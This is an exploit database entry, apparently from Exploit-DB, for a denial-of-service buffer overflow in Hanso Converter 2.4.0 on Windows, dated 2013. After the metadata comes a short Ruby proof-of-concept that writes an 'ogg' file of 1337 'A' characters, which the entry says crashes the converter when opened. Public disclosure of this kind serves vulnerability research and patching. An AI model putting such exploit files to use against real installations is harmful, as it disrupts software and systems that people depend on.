Hanso Converter 2.4.0 - 'ogg' Buffer Overflow (Denial of Service)
Author: Necmettin COSKUN
type: dos
platform: windows
port:
date_added: 2013-11-12
date_updated: 2015-04-22
verified: 1
codes: OSVDB-99779
tags:
aliases:
screenshot_url: http://www.exploit-db.com/screenshots/idlt30000/screen-shot-2013-11-12-at-131355.png
application_url:
#!/usr/bin/env ruby
# coding:UTF-8
# Exploit Title:Hanso Converter 2.4.0 Buffer Overflow(DoS)
# Author:Necmettin COSKUN => twitter.com/babayarisi
# Vendor :www.hansotools.com
# Software link:http://www.hansotools.com/downloads/hanso-converter-setup.exe
# version: 2.4.0
# Tested on: windows XP sp2
DENEME = "A" * 1337
File.open('hanzo.ogg', 'w') do |bofdosya|
bofdosya.puts (DENEME)
bofdosya.close()
end